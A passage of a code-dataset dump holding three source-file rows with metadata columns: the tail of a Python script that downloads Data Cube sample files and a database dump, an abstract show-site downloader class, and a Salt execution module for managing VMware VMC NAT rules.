"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150309092308000000.nc"
]
database_dump_file = "/datacube/ingested_data/localuser/datacube_dump"
base_host = "http://192.168.100.14/"
base_data_path = "/datacube/ingested_data/localuser"
def download_file(data_file, count, total):
# see if we've already download this file
if os.path.isfile(data_file):
print("Storage unit {0} exists! Skipping download of {1}. ".format(os.path.basename(data_file), data_file))
return None
# attempt https connection
try:
request = Request(base_host + data_file)
response = urlopen(request)
# seems to be working
print("({0}/{1}) Downloading {2}".format(count, total, data_file))
# Open our local file for writing and build status bar
tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)
chunk_read(response, tf, report_hook=chunk_report)
tempfile_name = tf.name
tf.close()
#handle errors
except HTTPError as e:
print("HTTP Error:", e.code, data_file)
return False
except URLError as e:
print("URL Error:", e.reason, data_file)
return False
# Return the file size
shutil.copy(tempfile_name, data_file)
os.remove(tempfile_name)
return os.path.getsize(data_file)
# chunk_report taken from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
def chunk_report(bytes_so_far, chunk_size, total_size):
percent = float(bytes_so_far) / total_size
percent = round(percent * 100, 2)
sys.stdout.write("Downloaded %d of %d bytes (%0.2f%%)\r" % (bytes_so_far, total_size, percent))
if bytes_so_far >= total_size:
sys.stdout.write('\n')
# chunk_read modified from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
def chunk_read(response, local_file, chunk_size=8192, report_hook=None):
try:
total_size = response.info().getheader('Content-Length').strip()
except AttributeError:
total_size = response.getheader('Content-Length').strip()
total_size = int(total_size)
bytes_so_far = 0
while 1:
chunk = response.read(chunk_size)
try:
local_file.write(chunk)
except TypeError:
local_file.write(chunk.decode(local_file.encoding))
bytes_so_far += len(chunk)
if not chunk:
break
if report_hook:
report_hook(bytes_so_far, chunk_size, total_size)
return bytes_so_far
if __name__ == "__main__":
# Make sure we can write it our current directory
if os.access("/datacube", os.W_OK) is False:
print("Data Cube root path is not writeable - please ensure that the path '/datacube' exists and is writeable.")
exit(-1)
try:
os.makedirs(base_data_path)
except:
pass
print("Starting data download. When complete, a list of instructions will be provided for the next steps.")
# summary
total_bytes = 0
total_time = 0
count = 0
success = []
failed = []
skipped = []
size = download_file(database_dump_file, 1, 1)
for data_file in files:
count += 1
start = time.time()
size = download_file(data_file, count, len(files))
end = time.time()
# stats:
if size is None:
skipped.append(data_file)
elif size is not False:
# Download was good!
elapsed = end - start
elapsed = 1.0 if elapsed < 1 else elapsed
rate = (size / 1024**2) / elapsed
print("Downloaded {0}b in {1:.2f}secs, Average Rate: {2:.2f}mb/sec".format(size, elapsed, rate))
# add up metrics
total_bytes += size
total_time += elapsed
success.append({'file': data_file, 'size': size})
else:
print("There was a problem downloading {0}".format(data_file))
failed.append(data_file)
# Print summary:
print("Download Summary")
print("Successes: {0} files, {1} bytes ".format(len(success), total_bytes))
if len(failed) > 0:
print("Failures: {0} files".format(len(failed)))
if len(skipped) > 0:
print(" Skipped: {0} files".format(len(skipped)))
if len(success) > 0:
print(" Average Rate: {0:.2f}mb/sec".format((total_bytes / 1024.0**2) / total_time))
print("Requirements:")
print(
" An initialized Data Cube database named 'datacube'. More info found at https://github.com/ceos-seo/data_cube_ui/blob/master/docs/datacube_install.md"
)
print(" A database role named 'dc_user' that has read/write access to 'datacube'")
print("Next steps:")
print(
" Import the newly created database dump by running 'psql -U dc_user datacube < {}'".format(database_dump_file))
print(" Verify the import by running 'datacube -v product list'. There should be two entries.")
| 55.655052
| 159
| 0.78376
| 2,058
| 15,973
| 5.682702
| 0.126336
| 0.166909
| 0.208636
| 0.302522
| 0.744335
| 0.738435
| 0.733989
| 0.729201
| 0.729201
| 0.720222
| 0
| 0.24458
| 0.119201
| 15,973
| 286
| 160
| 55.84965
| 0.58668
| 0.029926
| 0
| 0.04661
| 0
| 0.016949
| 0.709432
| 0.625323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012712
| false
| 0.004237
| 0.04661
| 0
| 0.080508
| 0.09322
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
58c9c2501498b30b471ec75271ca5364fb8df703
| 201
|
py
|
Python
|
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class ShowSite(ABC):
@abstractmethod
def get_download_link(self, search_string: str, episode_search_string: str, episode: int = None) -> str:
pass
| 25.125
| 108
| 0.721393
| 26
| 201
| 5.384615
| 0.692308
| 0.242857
| 0.214286
| 0.314286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19403
| 201
| 7
| 109
| 28.714286
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0.2
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
450ecf8031bcf2ec196a25461a4d160f56847278
| 21,569
|
py
|
Python
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
kdsalvy/salt-ext-modules-vmware-1
|
9fdc941692e4c526f575f33b2ce23c1470582934
|
[
"Apache-2.0"
] | 10
|
2021-11-02T20:24:44.000Z
|
2022-03-11T05:54:27.000Z
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
waynew/salt-ext-modules-vmware
|
9f693382772061676c846c850df6ff508b7f3a91
|
[
"Apache-2.0"
] | 83
|
2021-10-01T15:13:02.000Z
|
2022-03-31T16:22:40.000Z
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
waynew/salt-ext-modules-vmware
|
9f693382772061676c846c850df6ff508b7f3a91
|
[
"Apache-2.0"
] | 15
|
2021-09-30T23:17:27.000Z
|
2022-03-23T06:54:22.000Z
|
"""
Salt execution module for nat rules
Provides methods to Create, Update, Read and Delete nat rules.
"""
import logging
import os
from saltext.vmware.utils import vmc_constants
from saltext.vmware.utils import vmc_request
from saltext.vmware.utils import vmc_templates
log = logging.getLogger(__name__)
__virtualname__ = "vmc_nat_rules"
def __virtual__():
return __virtualname__
def _create_payload_for_nat_rule(rule_id, user_input):
"""
This function creates the payload based on the template and user input passed
"""
data = vmc_request.create_payload_for_request(vmc_templates.create_nat_rules, user_input)
data["id"] = data["display_name"] = rule_id
return data
def get(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
verify_ssl=True,
cert=None,
cursor=None,
page_size=None,
sort_by=None,
sort_ascending=None,
):
"""
Retrieves nat rules for Given SDDC
CLI Example:
.. code-block:: bash
salt vm_minion vmc_nat_rules.get hostname=nsxt-manager.local domain_id=mgw ...
hostname
The host name of NSX-T manager
refresh_key
refresh_key to get access token
authorization_host
hostname to get access token
org_id
org_id of the SDDC
sddc_id
sddc_id for which nat rules should be retrieved
tier1
tier1 option are cgw and user defined tier1
nat
nat option are USER
verify_ssl
(Optional) Option to enable/disable SSL verification. Enabled by default.
If set to False, the certificate validation is skipped.
cert
(Optional) Path to the SSL certificate file to connect to NSX-T manager.
The certificate can be retrieved from browser.
cursor
(Optional) Opaque cursor to be used for getting next page of records (supplied by current result page)
page_size
(Optional) Maximum number of results to return in this page. Default page size is 1000.
sort_by
(Optional) Field by which records are sorted
sort_ascending
(Optional) Boolean value to sort result in ascending order. Enabled by default.
"""
log.info("Retrieving nat rules for SDDC %s", sddc_id)
api_url_base = vmc_request.set_base_url(hostname)
api_url = (
"{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
"policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules"
)
api_url = api_url.format(
base_url=api_url_base, org_id=org_id, sddc_id=sddc_id, tier1=tier1, nat=nat
)
params = vmc_request._filter_kwargs(
allowed_kwargs=["cursor", "page_size", "sort_ascending", "sort_by"],
cursor=cursor,
page_size=page_size,
sort_by=sort_by,
sort_ascending=sort_ascending,
)
return vmc_request.call_api(
method=vmc_constants.GET_REQUEST_METHOD,
url=api_url,
refresh_key=refresh_key,
authorization_host=authorization_host,
description="vmc_nat_rule.get",
verify_ssl=verify_ssl,
cert=cert,
params=params,
)
def get_by_id(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
nat_rule,
verify_ssl=True,
cert=None,
):
"""
Retrieves specific nat rule for Given SDDC
CLI Example:
.. code-block:: bash
salt vm_minion vmc_nat_rules.get_by_id hostname=nsxt-manager.local tier1=cgw ...
hostname
The host name of NSX-T manager
refresh_key
refresh_key to get access token
authorization_host
hostname to get access token
org_id
org_id of the SDDC
sddc_id
sddc_id for which nat rules should be retrieved
tier1
tier1 option are cgw and user defined tier1
nat
nat option are USER/default/Internal
nat_rule
id of specific nat rule
verify_ssl
(Optional) Option to enable/disable SSL verification. Enabled by default.
If set to False, the certificate validation is skipped.
cert
(Optional) Path to the SSL certificate file to connect to NSX-T manager.
The certificate can be retrieved from browser.
"""
log.info("Retrieving nat rule %s for SDDC %s", nat_rule, sddc_id)
api_url_base = vmc_request.set_base_url(hostname)
api_url = (
"{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
"policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
)
api_url = api_url.format(
base_url=api_url_base,
org_id=org_id,
sddc_id=sddc_id,
tier1=tier1,
nat=nat,
nat_rule=nat_rule,
)
return vmc_request.call_api(
method=vmc_constants.GET_REQUEST_METHOD,
url=api_url,
refresh_key=refresh_key,
authorization_host=authorization_host,
description="vmc_nat_rule.get_by_id",
verify_ssl=verify_ssl,
cert=cert,
)
def delete(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
nat_rule,
verify_ssl=True,
cert=None,
):
"""
Delete nat rules for Given SDDC
CLI Example:
.. code-block:: bash
salt vm_minion vmc_nat_rules.delete hostname=nsxt-manager.local tier1=cgw ...
hostname
The host name of NSX-T manager
refresh_key
refresh_key to get access token
authorization_host
hostname to get access token
org_id
org_id of the SDDC
sddc_id
sddc_id for which nat rules should be deleted
tier1
tier1 option are cgw and user defined tier1
nat
nat option are USER/default/Internal
nat_rule
id of specific nat rule
verify_ssl
(Optional) Option to enable/disable SSL verification. Enabled by default.
If set to False, the certificate validation is skipped.
cert
(Optional) Path to the SSL certificate file to connect to NSX-T manager.
The certificate can be retrieved from browser.
"""
log.info("Deleting nat rule %s for SDDC %s", nat_rule, sddc_id)
api_url_base = vmc_request.set_base_url(hostname)
api_url = (
"{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
"policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
)
api_url = api_url.format(
base_url=api_url_base,
org_id=org_id,
sddc_id=sddc_id,
tier1=tier1,
nat=nat,
nat_rule=nat_rule,
)
return vmc_request.call_api(
method=vmc_constants.DELETE_REQUEST_METHOD,
url=api_url,
refresh_key=refresh_key,
authorization_host=authorization_host,
description="vmc_nat_rule.delete",
responsebody_applicable=False,
verify_ssl=verify_ssl,
cert=cert,
)
def create(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
nat_rule,
verify_ssl=True,
cert=None,
action=None,
destination_network=None,
source_network=None,
translated_network=None,
translated_ports=vmc_constants.VMC_NONE,
scope=None,
service=None,
enabled=None,
firewall_match=None,
logging=None,
description=None,
tags=vmc_constants.VMC_NONE,
sequence_number=None,
):
"""
Create nat rules for Given SDDC
CLI Example:
.. code-block:: bash
salt vm_minion vmc_nat_rules.create hostname=nsxt-manager.local tier1=cgw ...
hostname
The host name of NSX-T manager
refresh_key
refresh_key to get access token
authorization_host
hostname to get access token
org_id
org_id of the SDDC
sddc_id
sddc_id for which nat rules should be created
tier1
tier1 option are cgw and user defined tier1
nat
nat option are USER/default/Internal
nat_rule
id of specific nat rule
verify_ssl
(Optional) Option to enable/disable SSL verification. Enabled by default.
If set to False, the certificate validation is skipped.
cert
(Optional) Path to the SSL certificate file to connect to NSX-T manager.
The certificate can be retrieved from browser.
action
specify type of nat rule it can have value REFLEXIVE, DNAT
REFLEXIVE nat rule require
source_network
translated_network
service should be empty
translated_ports should be None
destination_network should be none
DNAT Rule require
destination_network
translated_network
translated_ports can be none
service can be none
source_network can be None or input network.
destination_network
Represents the destination network
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
source_network
Represents the source network address
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
translated_network
Represents the translated network address
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
translated_ports
Port number or port range
Please note, if there is service configured in this nat rule, the translated_port
will be realized on NSX Manager as the destination_port. If there is no sevice configured,
the port will be ignored.
scope
(Optional) Array of policy paths of labels, ProviderInterface, NetworkInterface
If this value is not passed, then ["/infra/labels/cgw-public"] will be used by default.
service
(Optional) Represents the service on which the nat rule will be applied
If this value is not passed, then empty string will be used by default.
enabled
(Optional) Policy nat rule enabled flag
The flag, which suggests whether the nat rule is enabled or
disabled. The default is True.
firewall_match
(Optional) Represents the firewall match flag
It indicates how the firewall matches the address after nating if firewall
stage is not skipped.
possible values: MATCH_EXTERNAL_ADDRESS, MATCH_INTERNAL_ADDRESS
Default: "MATCH_INTERNAL_ADDRESS"
logging
(Optional) Policy nat rule logging flag
default: False
description
(Optional) Description of nat rule
tags
(Optional) Opaque identifiers meaningful to the API user. Maximum 30 tags can be associated:
.. code-block::
tags='[
{
"tag": "<tag-key-1>"
"scope": "<tag-value-1>"
},
{
"tag": "<tag-key-2>"
"scope": "<tag-value-2>"
}
]'
sequence_number
(Optional) Sequence number of the nat rule
The sequence_number decides the rule_priority of a nat rule.
default: 0
type: int
Example values:
.. code-block::
{
"action": "REFLEXIVE",
"translated_network": "10.182.171.36",
"translated_ports": null,
"destination_network": "",
"source_network": "192.168.1.23",
"sequence_number": 0,
"service": "",
"logging": false,
"enabled": false,
"scope": [
"/infra/labels/cgw-public"
],
"tags": [
{
"tag": "tag1",
"scope": "scope1"
}
],
"description": "",
"firewall_match": "MATCH_INTERNAL_ADDRESS"
}
Please refer the `Nat Rule <https://developer.vmware.com/docs/nsx-vmc-policy/latest/data-structures/InlinePolicyNatRule1/>`_ to get insight of input parameters.
"""
log.info("Creating nat rule %s for SDDC %s ", nat_rule, sddc_id)
api_url_base = vmc_request.set_base_url(hostname)
api_url = (
"{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
"policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
)
api_url = api_url.format(
base_url=api_url_base,
org_id=org_id,
sddc_id=sddc_id,
tier1=tier1,
nat=nat,
nat_rule=nat_rule,
)
allowed_dict = {
"action": action,
"description": description,
"destination_network": destination_network,
"scope": scope,
"service": service,
"source_network": source_network,
"tags": tags,
"translated_network": translated_network,
"translated_ports": translated_ports,
"enabled": enabled,
"firewall_match": firewall_match,
"logging": logging,
"sequence_number": sequence_number,
}
req_data = vmc_request._filter_kwargs(
allowed_kwargs=allowed_dict.keys(), allow_none=["translated_ports", "tags"], **allowed_dict
)
data = _create_payload_for_nat_rule(nat_rule, req_data)
return vmc_request.call_api(
method=vmc_constants.PUT_REQUEST_METHOD,
url=api_url,
refresh_key=refresh_key,
authorization_host=authorization_host,
description="vmc_nat_rule.create",
data=data,
verify_ssl=verify_ssl,
cert=cert,
)
def update(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
nat_rule,
verify_ssl=True,
cert=None,
action=None,
destination_network=None,
source_network=None,
translated_network=None,
translated_ports=vmc_constants.VMC_NONE,
scope=None,
service=None,
enabled=None,
firewall_match=None,
logging=None,
description=None,
tags=vmc_constants.VMC_NONE,
sequence_number=None,
display_name=None,
):
"""
Update nat rule for Given SDDC
CLI Example:
.. code-block:: bash
salt vm_minion vmc_nat_rules.update hostname=nsxt-manager.local tier1=cgw ...
hostname
The host name of NSX-T manager
refresh_key
refresh_key to get access token
authorization_host
hostname to get access token
org_id
org_id of the SDDC
sddc_id
sddc_id for which nat rules should be updated
tier1
tier1 option are cgw and user defined tier1
nat
nat option are USER/default/Internal
nat_rule
id of specific nat rule
verify_ssl
(Optional) Option to enable/disable SSL verification. Enabled by default.
If set to False, the certificate validation is skipped.
cert
(Optional) Path to the SSL certificate file to connect to NSX-T manager.
The certificate can be retrieved from browser.
action
specify type of nat rule it can have value REFLEXIVE, DNAT
REFLEXIVE nat rule require
source_network
translated_network
service should be empty
translated_ports should be None
destination_network should be none
DNAT Rule require
destination_network
translated_network
translated_ports can be none
service can be none
source_network can be None or input network.
destination_network
Represents the destination network
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
source_network
Represents the source network address
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
translated_network
Represents the translated network address
This supports single IP address or comma separated list of single IP
addresses or CIDR. This does not support IP range or IP sets.
translated_ports
Port number or port range
Please note, if there is service configured in this nat rule, the translated_port
will be realized on NSX Manager as the destination_port. If there is no sevice configured,
the port will be ignored.
scope
(Optional) Array of policy paths of labels, ProviderInterface, NetworkInterface
If this value is not passed, then ["/infra/labels/cgw-public"] will be used by default.
service
(Optional) Represents the service on which the nat rule will be applied
If this value is not passed, then empty string will be used by default.
enabled
(Optional) Policy nat rule enabled flag
The flag, which suggests whether the nat rule is enabled or
disabled. The default is True.
firewall_match
(Optional) Represents the firewall match flag
It indicates how the firewall matches the address after nating if firewall
stage is not skipped.
possible values: MATCH_EXTERNAL_ADDRESS, MATCH_INTERNAL_ADDRESS
Default: "MATCH_INTERNAL_ADDRESS"
logging
(Optional) Policy nat rule logging flag
default: False
description
(Optional) Description of nat rule
tags
(Optional) Opaque identifiers meaningful to the API user. Maximum 30 tags can be associated:
.. code-block::
tags='[
{
"tag": "<tag-key-1>"
"scope": "<tag-value-1>"
},
{
"tag": "<tag-key-2>"
"scope": "<tag-value-2>"
}
]'
sequence_number
(Optional) Sequence number of the Nat Rule
The sequence_number decides the rule_priority of a nat rule.
default: 0
type: int
display_name
Identifier to use when displaying entity in logs or GUI
Example values:
.. code-block::
{
"action": "REFLEXIVE",
"translated_network": "10.182.171.36",
"translated_ports": null,
"destination_network": "",
"source_network": "192.168.1.23",
"sequence_number": 0,
"service": "",
"logging": false,
"enabled": false,
"scope": [
"/infra/labels/cgw-public"
],
"tags": [
{
"tag": "tag1",
"scope": "scope1"
}
],
"description": "",
"firewall_match": "MATCH_INTERNAL_ADDRESS"
}
Please refer the `Nat Rule <https://developer.vmware.com/docs/nsx-vmc-policy/latest/data-structures/InlinePolicyNatRule1/>`_ to get insight of input parameters
"""
log.info("Updating Nat rule %s for SDDC %s ", nat_rule, sddc_id)
api_url_base = vmc_request.set_base_url(hostname)
api_url = (
"{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
"policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
)
api_url = api_url.format(
base_url=api_url_base,
org_id=org_id,
sddc_id=sddc_id,
tier1=tier1,
nat=nat,
nat_rule=nat_rule,
)
# fetch the nat rule for the given nat_rule
existing_data = get_by_id(
hostname,
refresh_key,
authorization_host,
org_id,
sddc_id,
tier1,
nat,
nat_rule,
verify_ssl,
cert,
)
if vmc_constants.ERROR in existing_data:
return existing_data
allowed_dict = {
"action": action,
"description": description,
"destination_network": destination_network,
"scope": scope,
"service": service,
"source_network": source_network,
"tags": tags,
"translated_network": translated_network,
"translated_ports": translated_ports,
"enabled": enabled,
"firewall_match": firewall_match,
"logging": logging,
"sequence_number": sequence_number,
"display_name": display_name,
}
req_data = vmc_request._filter_kwargs(
allowed_kwargs=allowed_dict.keys(), allow_none=["translated_ports", "tags"], **allowed_dict
)
payload = vmc_request.create_payload_for_request(
vmc_templates.update_nat_rules, req_data, existing_data
)
return vmc_request.call_api(
method=vmc_constants.PATCH_REQUEST_METHOD,
url=api_url,
refresh_key=refresh_key,
authorization_host=authorization_host,
description="vmc_nat_rules.update",
responsebody_applicable=False,
data=payload,
verify_ssl=verify_ssl,
cert=cert,
)
| 27.546616
| 164
| 0.616904
| 2,657
| 21,569
| 4.820474
| 0.105382
| 0.036071
| 0.013117
| 0.023189
| 0.893114
| 0.887883
| 0.873829
| 0.867036
| 0.860009
| 0.852983
| 0
| 0.007706
| 0.314155
| 21,569
| 782
| 165
| 27.581841
| 0.858109
| 0.564143
| 0
| 0.721429
| 0
| 0.017857
| 0.161109
| 0.081304
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.017857
| 0.003571
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.